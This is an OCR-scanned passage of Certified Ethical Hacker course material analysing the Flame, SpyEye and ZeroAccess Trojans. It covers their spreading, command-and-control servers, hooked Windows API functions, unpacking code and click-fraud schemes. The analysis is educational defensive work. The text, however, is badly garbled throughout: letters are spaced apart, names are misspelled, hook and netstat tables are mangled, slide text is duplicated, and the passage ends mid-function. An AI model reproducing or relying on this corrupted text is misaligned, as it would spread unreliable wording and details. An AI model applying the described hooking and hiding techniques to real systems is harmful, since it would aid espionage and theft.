T h e m a lw a re is u sed f o r ta r g e te d c y b e r e s p io n a g e in M id d le E aste rn c o u n trie s
F la m e ca n s p re a d t o o th e r syste m s o v e r a lo c a l n e tw o rk (LA N ) o r v ia USB s tic k
I t ca n re c o rd a u d io , s c re e n s h o ts , k e y b o a rd a c tiv it y , a n d n e t w o r k t r a f f ic
T h e p ro g ra m a lso re c o rd s S kyp e c o n v e rs a tio n s a n d ca n t u r n in fe c te d c o m p u te rs in to
B lu e to o th b e a c o n s w h ic h a tte m p t t o d o w n lo a d c o n ta c t in fo r m a tio n f r o m n e a rb y
B lu e to o th -e n a b le d d e v ic e s
Copyright O by E6-6«ncil. Ail Rights Reserved. Reproduction is Strictly Prohibited.
& g ‫־‬N
O
>
T r o ja n
A n a ly s is :
F la m
e
S ource: h tt p :/ /w w w .k a s p e r s k v .c o m
F la m e , a ls o k n o w n as F la m e r , s K y W l p e r o r S k y w i p e r , is m o d u l a r c o m p u t e r m a l w a r e t h a t a t t a c k s
c o m p u t e r s r u n n i n g t h e M i c r o s o f t W i n d o w s o p e r a t i n g s y s t e m . T h is m a l w a r e is u s e d f o r t a r g e t e d
c y b e r e s p i o n a g e . It c a n s p r e a d t o o t h e r s y s t e m s o v e r a lo c a l n e t w o r k (L A N ) o r v ia USB s tic k . It
c a n r e c o r d a u d i o , s c r e e n s h o t s , k e y b o a r d a c t i v i t y , a n d n e t w o r k t r a f f i c . It a ls o r e c o r d s S k y p e
c o n v e rs a tio n s
and
can
tu rn
in fe c te d
c o m p u te rs
in to
B lu e to o th
beacons
th a t
a tte m p t
to
d o w n lo a d c o n t a c t i n f o r m a t i o n f r o m n e a r b y B lu e t o o t h - e n a b le d d e v ic e s . T h e f o l l o w i n g d ia g r a m
d e p i c t s h o w a n a t t a c k e r s u c c e e d s in i n s t a l l i n g F l a m e o n a v i c t i m ' s s y s t e m .
Sends data to attacker
«»
A tta c k e r
o
©
©
Provides a instruction
to get data
Sets com m and and
control center
©
@ >
C o m m a n d and
C o n tro l C e n te r
‫׳״‬i»
Redirects to
malicious server
*‫••״‬
..........................© ‫׳‬
J ©
M a lw a r e S e rv e r
Downloads a malware
f)
U
©
M
■m
3
Infects other hardware
in LAN.
In fe c te d H a rd w a re in LAN
In o r d e r t o i n j e c t a T r o j a n o n t o t h e v i c t i m ' s s y s t e m a n d t o g a i n s e n s i t i v e i n f o r m a t i o n , a t t a c k e r s
firs t se t a c o m m a n d
M o d u le 0 6 P ag e 9 22
a n d c o n tr o l c e n te r a n d a m a lw a r e s e rv e r. N e x t, th e a tta c k e r se n d s a
p h i s h i n g e m a i l t o t h e v i c t i m ' s s y s t e m a n d l u r e s h i m o r h e r t o o p e n t h e l in k . O n c e t h e a t t a c k e r
o p e n s t h e l in k , h e o r s h e is r e d i r e c t e d t o t h e m a l i c i o u s s e r v e r . A s a r e s u l t , t h e m a l w a r e g e t s
d o w n l o a d e d o n t o t h e v i c t i m ' s s y s t e m a n d t h e s y s t e m is i n f e c t e d . T h is i n f e c t e d m a c h i n e i n f e c t s
th e
o th e r
h a rd w a re
c o n n e c te d
on
th e
LAN. T h u s,
th e
com m ands
fro m
th e
c o n tro l
and
c o m m a n d c e n te r a re s e n t t o a n d re c e iv e d f r o m th e in fe c te d h a r d w a r e LAN. A c c o rd in g t o th e
re c e iv e d c o m m a n d s , th e in fe c te d h a r d w a r e LANs se n d th e d a ta t o th e c o n tr o l a n d c o m m a n d
ce n te r.
M o d u le 0 6 P ag e 9 23
T r o j a n A n a ly s is : F la m e
c gh
( C o n t’d )
The Flam e C&C in frastru ctu re, w hich had been
operating for years, w ent offline im m ed iately after
‫—יי‬
According to Kaspersky Lab's sinkhole, infected
users w ere registered in m u ltip le regions
0
Kaspersky Lab disclosed th e discovery of the
m alw are's existence last w eek
including th e M id d le East, Europe, N orth Am erica,
and Asia-Pacific
Currently th ere are m ore th a n 80 k n ow n do m ain s
used by Flam e for C&C servers and its related
B
dom ains, w hich have been registered betw een
2008 and 2012
During the past 4 years, servers hosting the Flame C&C
infrastructure m oved betw een m u ltip le loca tion s,
including Hong Kong, Turkey, Germ any, Poland,
B
M alaysia, Latvia, the United Kingdom, and Switzerland
The Flam e attackers seem to have a high interest
in PDF, O ffice, and A u toC ad draw ings
The data uploaded to the Flam e C&C is encrypted
using relatively sim ple algorithm s; stolen
docum ents are com pressed using op en source
Z lib and m od ified P P D M com p ressio n
W in d o w s 7 64 bit, w hich we previously
The Flam e C &C dom ains w ere registered w ith a list
‫ש‬
of fake id e n titie s and w ith a variety o f registrars,
going back as far as 2008
recom m ended as a good solution against
infections w ith o th er m alw are, seem s to be
effective against Flame
http://www.kaipersky.com
Copyright O by E6-6«ncil. Ail Rights Reserved. Reproduction is Strictly Prohibited.
T r o ja n
A n a ly s is :
F la m
e
( C o n t ’d )
S ource: h tt p :/ /w w w .k a s p e r s k v .c o m
K a s p e r s k y Lab s u m m a r i z e s t h e r e s u l t s o f t h e a n a l y s is a b o u t F la m e as f o l l o w s :
9
The
F la m e
im m e d ia te ly
C&C
a fte r
in fra s tru c tu re ,
K aspersky
Lab
w h ic h
had
d is c lo s e d
been
th e
o p e ra tin g
d is c o v e ry
of
fo r
years,
went
th e
m a lw a r e 's
o fflin e
e x is te n c e
re c e n tly .
9
C u r r e n t l y t h e r e a r e m o r e t h a n 8 0 k n o w n d o m a i n s u s e d b y F la m e f o r C & C s e r v e r s a n d its
re la te d d o m a in s , w h ic h h a ve b e e n re g is te re d b e tw e e n 2 0 0 8 a n d 2 0 1 2 .
9
D u r i n g t h e p a s t f o u r y e a r s , s e r v e r s h o s t i n g t h e F la m e C & C i n f r a s t r u c t u r e m o v e d b e t w e e n
m u ltip le
l o c a t i o n s , i n c l u d i n g H o n g K o n g , T u r k e y , G e r m a n y , P o la n d , M a l a y s i a , L a tv ia , t h e
U n ite d K in g d o m , a n d S w itz e rla n d .
9
T h e F la m e C & C d o m a i n s w e r e r e g i s t e r e d w i t h a n i m p r e s s i v e l is t o f f a k e i d e n t i t i e s a n d w i t h a
v a r i e t y o f r e g i s t r a r s , g o i n g b a c k as f a r as 2 0 0 8 .
9
A c c o r d i n g t o K a s p e r s k y L a b 's s i n k h o l e , i n f e c t e d u s e r s w e r e r e g i s t e r e d in m u l t i p l e r e g i o n s
i n c l u d i n g t h e M i d d l e E ast, E u r o p e , N o r t h A m e r i c a , a n d A s ia - P a c i f i c .
9
T h e F la m e a t t a c k e r s s e e m t o h a v e a h i g h i n t e r e s t in PDFs, O f f i c e , a n d A u t o C a d d r a w i n g s .
9
T h e d a t a u p l o a d e d t o t h e F la m e C & C is e n c r y p t e d u s i n g r e l a t i v e l y s i m p l e a l g o r i t h m s . S t o l e n
d o c u m e n ts
M o d u le 0 6 P ag e 9 2 4
a re
com pressed
u s in g
open
so u rce
Z li b
and
m o d ifie d
PPDM
c o m p re s s io n .
W i n d o w s 7 6 4 b i t , w h i c h w e p r e v i o u s l y r e c o m m e n d e d as a g o o d s o l u t i o n a g a i n s t i n f e c t i o n s
w i t h o t h e r m a l w a r e , s e e m s t o b e e f f e c t i v e a g a i n s t F la m e .
M o d u le 0 6 P ag e 9 2 5
F la m e C & C S e r v e r A n a ly s is
C EH
(«rt1fw4
ItkNjI lUilwt
Flam e's C&C S e rver w as ru n n in g o n 6 4 -b it
D e b ia n 6 .0 .x OS u n d e r O penV Z a nd using PHP,
P yth o n , a nd bash p ro g ra m m in g languages w ith
JW«PP«
*!..■►‫*•י‬.
M yS Q L d a ta b a s e on A p a che 2.x w e b s e rv e r
w ith se lf-sig n e d c e rtific a te s
It w as accessible o v e r th e HTTPS p ro to c o l,
p o rts 443 a nd 8 080
The d o c u m e n t r o o t d ire c to ry was
/v a r / w w w / h t d o c s / , w h ic h has s u b -d ire c to rie s
joaa'itl 'jgff»»PTOt Maa4e»X
a nd PHP scrip ts
A n in fe c te d m a ch in e w as c o n tro lle d using a
C o n te n ts o f th e / v a r /w w w / h td o c s /n e w s fo ry o u / d ire cto ry
m e ssag e -e xcha n g e m e c h a n is m based o n data
Control !*unci
c o n ta in e rs file s
‫•־־־'•״‬
l
»
•
* :V ‫ל‬
‫״‬,‫—י‬
UOM
»‫*״‬-
Donmlonil dal j
C ontrol panel in terface
http://www.kaspersky.com
Copyright © by
S p
F la m
e
C & C
EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited
S e r v e r A n a ly s is
S o u rce : h tt p :/ /w w w .k a s p e r s k y .c o m
F l a m e 's C & C S e r v e r w a s r u n n i n g o n 6 4 - b i t D e b i a n 6 . 0 . x OS u n d e r O p e n V Z a n d u s i n g PHP,
P y t h o n , a n d b a s h p r o g r a m m i n g l a n g u a g e s w i t h M y S Q L d a t a b a s e o n A p a c h e 2 .x w e b s e r v e r w i t h
s e l f - s i g n e d c e r t i f i c a t e s . T h is s e r v e r c o n f i g u r a t i o n w a s a t y p i c a l L A M P ( L i n u x , A p a c h e , M y S Q L ,
PHP) s e t u p . It w a s u s e d t o h o s t a w e b - b a s e d c o n t r o l p a n e l as w e l l as t o r u n s o m e s c h e d u l e d
f u l l y a u t o m a t e d s c r i p t s in t h e b a c k g r o u n d .
It w a s a c c e s s i b le o v e r t h e HTTPS p r o t o c o l , p o r t s 4 4 3 a n d 8 0 8 0 . T h e d o c u m e n t r o o t d i r e c t o r y
w a s / v a r / w w w / h t d o c s / , w h i c h h a s s u b - d i r e c t o r i e s a n d PHP s c r i p t s . W h i l e t h e s y s t e m s h a d PHP 5
in s ta lle d ,
th e
code
was
made
to
ru n
on
PHP4
as
w e ll.
For
e x a m p le ,
/ v a r / w w w / h t d o c s / n e w s f o r y o u / U t il s . p h p has th e " s tr _ s p lit" f u n c t io n d e fin e d t h a t im p le m e n ts
t h e " s t r _ s p l i t " f u n c t i o n lo g ic s f r o m
P H P 5, w h i c h w a s n o t a v a i l a b l e in P H P 4 . T h e d e v e l o p e r s o f
t h e C &C c o d e m o s t lik e ly i m p le m e n t e d c o m p a t ib i li t y w i t h PHP4 b e c a u s e t h e y w e r e n o t s u re
w h i c h o n e o f t w o m a j o r PHP v e r s i o n s w o u l d b e i n s t a l l e d o n t h e C & C s .
M o d u le 0 6 P ag e 9 2 6
M o d u le 0 6 P ag e 9 2 7
E t h ic a l H a c k in g a n d C o u n t e r m e a s u r e s
E x a m 3 1 2 - 5 0 C e r t if ie d E t h ic a l H a c k e r
F la m e C&C S erver A n a ly sis
r ‫ש‬u
( C o n t ’d )
Certified | ttfcxjl »U*b«
0
C&C can u nderstand several com m unication protocols including O ldProtocol,
OldProtocolE, SignupProtocol, and R edProtocol to talk to different clients
cod en am ed SP, SPE, FL, and IP
CO M M AND AND CONTROL SERVER
FL (Flame)
PROTOCOLS
L
O ld P R o t o c o l
t>
R e d P ro to c o l
CLIENTS
Not yet implemented
•->
i
O ld P ro to c o llE
1 ‫י‬
‫י‬
:
HTTP, H TTPS
i
■f>
S ig n u p P ro to c o l
i
s_________________
http://www.kospersky.com
C lie n ts a n d P ro to c o ls re la tio n s fo u n d in th is F la m e C & C
Copyright © by EG-C(ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
F l a m
e
C
& C
S e r v e r
A n a l y s i s
( C
o n t ’ d )
S o u rce : h ttp ://w w w .k a s p e r s k y .c o m
C&C
can
u n d e rs ta n d
S ig n u p P ro to c o l, a n d
se ve ra l
c o m m u n ic a tio n
R e d P ro to c o l to
ta lk t o
p ro to c o ls
in c lu d in g
O ld P ro to c o l,
d if f e r e n t c lie n ts c o d e n a m e d
ty p ic a l c lie n t s e s s io n h a n d le d b y t h e C & C s t a r t e d f r o m
O ld P ro to c o lE ,
S P , S P E , FL, a n d
IP . A
re c o g n itio n o f th e p ro to c o l v e rs io n , th e n
lo g g in g o f c o n n e c t io n i n f o r m a t i o n , f o l l o w e d b y d e c o d i n g c lie n t r e q u e s t a n d s a v in g it t o t h e lo c a l
f ile s t o r a g e in e n c r y p t e d f o r m . A ll m e t a d a t a
a b o u t file s re c e iv e d f r o m
t h e c l i e n t w a s k e p t in a
M y S Q L d a t a b a s e . T h e C & C s c r i p t e n c r y p t s a ll f ile s r e c e i v e d f r o m
th e c lie n t. T h e C & C uses a PG P-
lik e m e c h a n is m
u s in g t h e
CBC
m ode
e n c ry p tio n ,
t o e n c r y p t f i l e s . F i r s t , t h e f i l e d a t a is e n c r y p t e d
( w ith
th e
s ta tic
IV ). T h e
B lo w fis h
key
is
B lo w fis h
key
e n c ry p te d
is g e n e r a t e d
w ith
a
p u b lic
ra n d o m ly
key
u s in g
B lo w fis h a lg o r ith m
fo r
each
file .
a s y m m e tric
in
A f t e r file
e n c ry p tio n
a lg o rith m fr o m th e o p e n s s l_ p u b lic _ e n c ry p t PHP fu n c tio n .
M o d u le 0 6 P a g e 9 2 8
E t h i c a l H a c k i n g a n d C o u n t e r m e a s u r e s C o p y r i g h t © b y E C - C 0 U n C il
A l l R ig h t s R e s e r v e d . R e p r o d u c t i o n is S t r i c t l y P r o h i b i t e d .
COMMAND AND CONTROL SERVER
FL (Flame)
PROTOCOLS
OldPRotocol
SP
CLIENTS
‫—יו‬
‫״‬
RedProtocol
Not yet implemented
‫י‬
‫י‬
SPE
G
■
‫>׳‬
OldProtocollE
Internet:
HTTP, HTTPS
|
I
IP
■
‫ •>׳‬SignupProtocol
FIGURE 6.39: Clients and protocol relations found in this Flame C&C
M o d u le 0 6 P a g e 9 2 9
T
r
o
j
a
n
A
n
a
l
y
s
i
s
:
S
p
y
E
y
e
C
J
The Trojan makes use of user mode rootkit techniques to hide both its registry key
located \ns\deHKEY_CURRENT_USER\SOFTWARE\Microsoft\ Windows\Current
Version\Run and the folder containing th e Trojan executable and the configuration
file config.bin
J
The folder is usually located in th e root directory of th e drive where the operating
system is located
SpyEye is able to inject code in running
processes and can perform the following
functions:
CYWflJWJW
e4|*‫״‬bB|WlNINt I dllifHnetHMil iri •A
CVw»CKM5\5»xccr0:^#l0Cw0!458|\s‫׳‬lNINETdlH11PS0n<fi0q.*xV
:V*lW)CNVS\1yatew2\wnloooricxf[G*0] rtdl HI'MHnumerateVakjeKey
C\\^lflO<WS\wy11*ro32^nbwr1«x«{&iO] ‫׳>׳‬Jl.dllMlQuw|011*1.tc1vFU
C\^»JW^5‫\־‬wt«22«‫^׳‬nk>ooaoxc(&<0ir*dl.dllN(Ro0ir«Tlro:d
C\W*MXM\^l«‫*־‬G\*nbpm.x‫(״‬UO] rMI <IHNI'i-II1foimalcnF1W
C\WIHOCN,/S\.\^t*11:Cl\«r1kjuu11*x»(6-<01‫׳‬Wl.dl'NlVJiCorf.iiJ
C
VXwntooon^x^lUDJkeirvslWdMIiaNrialrjr.lwrCncto
CV/;»JWW‫־‬:\^h‫׳»״‬aUnb?.a-x»{E4D)ADVAPl3?«IIIC‫>׳‬p1rncli.(<
CV1‫ ״‬n00w‫־‬s\^<1»‫׳‬n32l»,‫ ׳‬nlooor1axc(&40] CRrPT32.dl'FF>‫׳‬:ln‫־‬por1C©11$tCfe
C\ÎNOOw/S\1yatefnX^nboor\exflMCij USER32dl 11aruto!eMe*M0;
CVW*C»ON'/S\jv*1»r..S2V^r1lt»yc»rw#x*{&*0)WS2_32JUvrd
© Capture netw ork traffic
t> Send and receive netw ork packets in order
to bypass application firew alls
CVÎHOOv/SNMieiwiS^wnioooriflxeiE^Div/ININEr.dlHrtioiTOiOuorjOoiiw^
e
Hide and prevent access to the startup
registry entry
e
Hide and prevent access to the binary code
- \VVIHOCN\fj\ty5ta™^V»nbgQrvexe{fciOJWINIMETd i l l l it f - f J p r t 1 l ‫־‬l1 * |1 * ? 1 W
C V W tC X > .v ‫׳‬S \ ^ t e r H ‫־‬2 ^ ‫ ״‬n b 9 o r ^ x » { & * 0 1 W I N I M E r .d ll H K 1 / v j tP ^ ^ « H B .
C V/‫»» ׳‬OWS\»y«le1»32\>‫»׳‬nbo0f\exc(6<OJWINIME r dl(lnlc11v;ICbKHandc
C V^tJOOWi\tyjlr‫׳‬n32\«nb?1nexr{64U]WINIME rdllHltfSeivflrcf.‫^ ״‬
CYw»®OWS\Mten#32^wboor1axef&40iv,lINII'IEr.dl!HRc$ar1:Roau«ft ..
H
//H /l'iA U d /n *POBAEBXB
772118D68Bv<09JM&06/£E29t
7C90D9TC0Byte* WPO&tDKSB
7C300F9E8B*■*. JMP0&E2DC2
7C90E4$c9B*ec »'P:BAP50^
7C90E[09 BBytot JMP0EÔ7a:S
7C30E9758
777DnfEB0n>r,
&3)2?78ByWJJkFC8«2E78
MPCBA0n3JI
JMTT^&r^n
77AEF74B8S/« JKF:BWE8>
77D48f:lT 0f:y*-.‫ י‬JMPQBA0930:
7lAB42a&8B,«.v .KP<»*£AS5
77IB81A788*et J»«PC8*E?8«D
771C4ACSBB>*e1 MP0B4£/Asa
771C54CA8B,t»r .HP<*Oi.S33
771C61DC8Byle1 JMP0F/C9415
771C?68B50/h [EB. 01. C\ E9 7
77IC768E2B*et )•1.941 >CHGE_
API fu n ctio n s h ooked by th e Trojan w ith in the
w in logon .exe v irtu a l address space
© Hide the own process on injected processes
e
E
Steal inform ation from Internet Explorer
and M o zilla Firefox
http://techblog.avira.com
Copyright © by EG-C(ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
A
T r o j a n
A n a l y s i s :
S p y E y e
S o u rce : h ttp ://te c h b lo g .a v ira .c o m
The
T ro ja n
m akes
use o f user m o d e
ro o tk it te c h n iq u e s to
h id e
b o th
its
re g is try
key
in s id e
H K E Y _ C U R R E N T _ U S E R \S O F T W A R E \M ic ro s o ft\W in d o w s \C u rre n t V e r s io n \R u n
fo ld e r
c o n ta in in g
th e
T ro ja n
e x e c u ta b le
and
th e
c o n fig u r a tio n
file
c o n fig .b in .
The
lo c a te d
and
th e
fo ld e r
is
u s u a l l y l o c a t e d i n t h e r o o t d i r e c t o r y o f t h e d r i v e w h e r e t h e o p e r a t i n g s y s t e m is l o c a t e d .
S p y E y e is a b l e t o i n j e c t c o d e i n r u n n i n g p r o c e s s e s a n d c a n p e r f o r m t h e f o l l o w i n g f u n c t i o n s :
9
C a p tu re n e tw o rk tra ffic
0
S e n d a n d r e c e iv e n e t w o r k p a c k e t s in o r d e r t o b y p a s s a p p l i c a t i o n f i r e w a l l s
Q
H id e a n d p r e v e n t a cce ss t o t h e s ta r t u p r e g is tr y e n t r y
Q
H id e a n d p r e v e n t a cce ss t o t h e b in a r y c o d e
0
H id e t h e o w n p ro c e s s o n in je c te d p ro c e s s e s
0
S te a l in f o r m a t io n f r o m
M o d u le 0 6 P a g e 9 3 0
I n t e r n e t E x p lo r e r a n d M o z illa F ire fo x
T h e fo llo w in g API fu n c tio n s a re
hooked
b y th e T ro ja n w ith in
th e w in lo g o n .e x e v ir tu a l a d d re s s
space:
text
text
text
text
text
text
text
.text
text
text
text
text
.text
text
text
text
text
text
C:\WINDOWS\System32Salgexel4681WININETdllMnternetReadFileExA
C:\WINDOWS\System32\alg exe[468] WININET dlllHttpSendRequestW
C: \W I ND 0 W S\system32\winlogon exe[840) ntdll dll! NtE numef ateValueKey
C: \W I ND 0 WS \system32\winlogon. exe[640j ntdll. dll! NtQueiyD irectoryFile
C: \W I ND 0 W S\system32\w1nlogon exe[640j ntdll dll! NtR esumeT hread
C: \W I ND 0 WS \system32\winlogon. exe[640j ntdll dll! NtS etl nformationFile
CAWIN D 0 WS \system32\winlogon. exe[640] ntdll. dll! NtVdmControl
C: \W I ND 0 W S\system32\winlogor! exe[640j kernel32. dll! Flushl nstructionCache
C: \W I ND 0 WS \system32\winlogon. exe[640] ADVAR 32. dll! CtyptE ncrypt
C: \W I ND 0 WS \system32\winlogon. exe[840] CRYPT 32. dll! PFXI mportCertS tore
C: \W I N D 0 WS \system32\winlogon. exe[640] US ER 32. dll! T ranslateM essage
C: \W I ND 0 WS \system32\winlogon. exe[840] WS2_32. dll! send
C: \W I ND 0 WS \system32\winlogon. exe[640] W l NIN ET.dll! InternetQ ueiyO ptiorA
C:\WIND0WS\system32\winlogon. exe[840] WININET dll! H ttpO penR equestA
C:\WIND0WS\system32\winlogon. exe[840] WININET dll! H ttpAddR equestH e...
C: \W I ND 0 WS \system32\winlogon. exe[640] W l NIN ET dll! InternetCloseH andle
C: \W I ND 0 W S\system32\winlogon exe[640) W l NIN ET dll! HttpS endR equestA
C:\WIND0WS\system32\winlogon. exe[640] WININET dll! HttpSendR equestA ..
771F7E9A 8 Bytes JMP 0BAEB2E6
77211808 8 Bytes JMP 0BAEE296
7C90D97G 8 Bytes JMP 0BAD769B
7C90DF5E 8 Bytes JMP 0BAE2DC2
7C90E45F 8 Bytes JMP 0BAF1507
7C90E5D9 8 Bytes JMP 0BAD73E5
7C90E975 8 Bytes JMP 0BAE2E78
7C839277 8 Bytes JMP 0BAD7831
77DF1558 8 Bytes JMP 0BAEA0E1
77AEF748 8 Bytes JMP 0BADE8QA
77D48BCE 8 Bytes JMP 0BAD930C
71AB428A 8 Bytes JMP 0BAEA9B5
771B81A7 8 Bytes JMP 0BAE7B9D
771C4AC5 8 Bytes JMP 0BAE7A88
771C54CA 8 Bytes JMP 0BADA638
771 CGI DC 8 Bytes JMP0BAE8415
771C76B8 5 Bytes [EB. 01, C3. E 9 .7.
771C76BE 2 Bytes [92,94] {XCHG E
FIGURE 6.40: API functions hooked by th e Trojan within th e winlogon.exe virtual address space
M o d u le 0 6 P a g e 9 3 1
T
r
o
j
a
n
A
n
a
l
y
s
i
s
:
S
p
y
E
y
CEH
e
( C o n t ’d )
After execution the Trojan connects to a
server and sends som e information about
th e system to the server like:
push
push
push
push
push
le a
push
push
push
c a ll
le a u e
re tn
© M D 5 o f the executed sam ple
6
Operating system version
© Com puter nam e
9
Internet Explorer version
8
U se rn a m e
© Version num ber of the m alw are
□
□
□
^
‫כ‬
Z]
^
‫כ‬
^
svchost exe
svchost exe
svchost exe
System
System
System
System
System
wniogon exe
1096
1272
1052
4
4
4
4
4
660
eax
i*i*6 5 4 7 i*B h
4969h
3367h
5047h
e c x , [e b p - 1C h]
ecx
d u o rd p t r [e b p -O C h ]
d u o r d p t r [ e b p - 1 0h ]
sub 42F 851
M a lw a re is packed w ith UPX a nd a p o ly m o rp h ic d e cry p to r
UDP
UDP
UDP
TCP
TCP
UDP
UDP
UDP
TCP
00e5f6a15
00e5f6e15
00e5f6a15
00e5f$al5
00e5f6a15
00e5f6a15
00e5f6a15
00e5f6a15
00e5f6a15
1034
1900
1032
nettxos-ssn
rmctosoftds
netb»os-ns
nettaos-dgm
rmcjosoftds
1083
‫י‬
■
■
‫י‬
‫י‬
0
0
■
■
revefsemtl-76-76-98-82 gogax com
■
https
00e5f$a15
00e5f6a15
USTENING
USTENING
syn. sent
Malware injected piece of code within winlogon.exe virtual address space
http://techblog.avira.com
--------------Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
T r o j a n
A n a l y s i s :
S p y E y e
( C
o n t ’ d )
S o u rce : h ttp ://te c h b lo g .a v ira .c o m
A fte r e x e c u tio n , th e T ro ja n c o n n e c ts to a s e rv e r a n d s e n d s s o m e in fo r m a tio n a b o u t th e s y s te m
t o t h e s e r v e r s u c h as:
0
M D 5 o f th e e x e c u te d s a m p le
0
O p e ra tin g s y s te m v e rs io n
0
C o m p u te r n a m e
0
I n te r n e t E x p lo re r v e rs io n
0
User nam e
0
V e rs io n n u m b e r o f th e m a lw a r e
3
□
□
ID
3
svchost exe
svchost exe
svchost.exe
System
System
Z3 System
^ System
^ System
^ winlogon exe
1096
1272
1052
4
4
4
4
UDP
UDP
UDP
TCP
TCP
UDP
UDP
4
UDP
660
TCP
00e5f6a15
00e5f6a15
00e5f6a15
00e5f6a15
00e5f6a15
00e5f6a15
00e5f6a15
00e5f6a15
00e5f6a15
1034
1900
1032
netbios-ssn
rraciosoft-ds
netb»os-ns
netbios-dgm
rmciosott-ds
1063
‫י‬
■
■
00e5f6a15
00e5t6a15
■
‫י‬
■
reve»se-mtl*76-76-9882‫ ־‬gogax com
"
"
0
0
“
"
"
hltps
USTENING
USTENING
SYN_SENT
FIGURE 6.41: Malware injected piece of code within winlogon.exe virtual address space
M o d u le 0 6 P a g e 9 3 2
M a l w a r e is p a c k e d w i t h U P X a n d a p o l y m o r p h i c d e c r y p t o r . I n t h e c o d e s n i p p e t t h a t f o l l o w s ,
y o u c a n s e e a c a ll t o a n o t h e r r o u t i n e a f t e r t h e e n d o f t h e u s u a l U P X d e c r y p t i o n : c a ll
sub
42F851.
push
push
push
push
push
push
lea
push
push
push
call
leaue
retn
eax
44651*74Bh
4969h
3367h
5047 h
e c x , [ebp-1Ch]
ecx
dword p t r [e bp-OCh]
dword p t r [ e b p - 1 0 h ]
s ubJ *2 F8 51
FIGURE 6.42: Malware is packed with UPX and a polymorphic decryptor
M o d u le 0 6 P a g e 9 3 3
Trojan A n alysis: Zero A c c e ss
CEH
(•rt1fw< itfcwal NmIm
ZeroAccess, also known as "Smiscer" or "Max++ rootkit," is a malicious Windows threat used to
generate revenue primarily through pay-per-click fraud
It arrives through various vectors, including web exploit kits and social engineering attacks, and
uses low-level rootkit functionality to remain persistent and stealth
ZeroAccess downloads fake security software, performs click fraud and search engine poisoning
SSSE39
lcclearn
■Uddtot Novkt
*V»X15
U
10‫־‬rtt
• c k k lic Pay Per d t k
Example
advertisement for
the Clicklce pay-
Dfar sirs!
W* « « proud to armour*.• 4 ‫ *••זו‬modem tokAum h • POC 04ffc.. cafed ChckU.« PPC clickice.com
CMcklce Team ncfcides professionals 01 vanous liekJs. who are woriong every day to make th« PPC even better tor you.
Apart from generous bids. Cbddct P K offers you me fo«owwg:
1.
Advanced f*«d Y*rwon
2. Our admnatratrve nterface mclxies a number or uOMies for traffic procesartg.
S. To *•irjjlify your work witfi sta tttic t, >t * pouAitv to c to o•• CMT-baMd lira• *haft for it.
4. An entire eoaectton of *eerts «s prowled (PTip reeds. PuMc feeds, image feeds, Javascript and XML reeds).
5. Databases of speaalued keywords are prowtod. ■t is ateo posutHe to obtan niche-spacilk: cusiomuod keyword baset froc of charge based
on webmaster's criteria.
0. Our a4>port can be reached via ICQ.
live Chat, e-n ai or ticket system.
per-dick network
Just give it a try and then make an informed decision. :)
dcbce.com
h ttp .//w ww. sym an tec. com
T r o j a n
A n a l y s i s :
Z e r o A c c e s s
S o u rce : h ttp ://w w w .s y m a n te c .c o m
Z e r o A c c e s s , a l s o k n o w n a s " S m i s c e r " o r " M a x + + r o o t k i t / 7 is a m a l i c i o u s W i n d o w s t h r e a t u s e d t o
g e n e ra te
re ve n u e
p rim a rily
th ro u g h
p a y -p e r-c lic k
fra u d .
Z ero A cce ss
uses
lo w - le v e l
ro o tk it
f u n c t i o n a l i t y t o r e m a in p e r s is t e n t a n d s t e a lt h . It a r r iv e s t h r o u g h v a r i o u s v e c t o r s , i n c lu d in g w e b
e x p lo it
k its
and
s o c ia l
e n g in e e rin g
a tta c k s .
fu n c tio n a lity th a t c o u ld be u se d fo r m u ltip le
A lth o u g h
Z ero A cce ss
c o n ta in s
g e n e ric
backdoor
p u rp o s e s , it h a s b e e n o b s e rv e d d o w n lo a d in g fa k e
s e c u r ity s o f t w a r e , p e r f o r m in g c lic k fr a u d , a n d s e a r c h in g e n g in e p o is o n in g .
C lic k f r a u d s c h e m e
Upon
in fe c tio n ,
Z ero A cce ss
w ill
in s ta ll
a d d itio n a l
p a y lo a d
m o d u le s ,
d o w n lo a d e d
th ro u g h
its
b a c k d o o r . G e n e r a l l y , t h i s is a n e x e c u t a b l e t h a t p e r f o r m s c l i c k f r a u d . T h i s c l i c k f r a u d s c h e m e h a s
b e e n o b s e rv e d t o u tiliz e m o r e t h a n o n e p a y -p e r-c lic k a ffilia te n e tw o r k .
A d v e r t is e r s s ig n u p w i t h
a d n e t w o r k s t h a t in t u r n
c o n tra c t w e b s ite
o w n e rs w h o
a re w illin g to
d i s p l a y a d v e r t i s e m e n t s o n t h e i r w e b s i t e s in e x c h a n g e f o r a s m a l l c o m m i s s i o n . T h e a d n e t w o r k s
c h a rg e th e
a d v e rtis e rs f o r d is tr ib u tin g
a n d d is p la y in g t h e ir a d s a n d
pay th e
w e b s ite
o w n e rs a
s m a ll c o m m i s s i o n e a c h t i m e a v i s i t o r v ie w s ( p a y - p e r - v ie w ) o r c lic k s ( p a y - p e r - c lic k ) o n t h e a d s .
M o d u le 0 6 P a g e 9 3 4
•
d c k l c e P a y Per Cfck
Dear S rs!
W e are proud to announce a new m odem solution for PPC traffic, c a le d Ckcklce PPC clickice.com
CUcklce Team includes professionals o f various fields, who are worlung every day to make this PPC even b e tte r for you.
Apart from generous bids, Clicklce PPC offers you th e fo lo w rx):
1. W ebm asters Advanced feed version.
2. Our adm inistrative in terface includes a number o f utihbes for traffic processng.
3. To swnplify your work w ith s tatistics, it is possible to choose G M T-based dme shift for it.
4 . An entire collection o f feeds is provided (Php feeds, Pubfcc Feeds, Im age feeds, JavaScript and XML feeds).
5. D atabases o f specialized keywords are provided; it is also posstole to obtavi niche-specific custom ized keyword bases free o f charge based
on webm aster's cnteria.
6 . Our support can be reached via ICQ,
Live Ch at, e-m ail or ticket system .
Just give it a try and then make an informed decision. :)
cbck 1ce.com
FIGURE 6.43: Example advertisement for the Clicklce pay-per-click network
M o d u le 0 6 P a g e 9 3 5
E t h i c a l H a c k i n g a n d C o u n t e r m e a s u r e s C o p y r i g h t © b y E C - C O U I lC il
CEH
Urt1fw4
( C o n t ’d )
J
ilh iu l lUtbM
An example of returned HTML can be
seen below
In a d d itio n to g en e ratin g revenue throu g h
pay-per-click netw orks, Z ero A cce ss hijacks
u se r's search es
W h e n an in fected use r search es in p o p u la r
search engines, (including g oo gle .com ,
f u n c tio n F o rm a tR e d ire c t(re f,
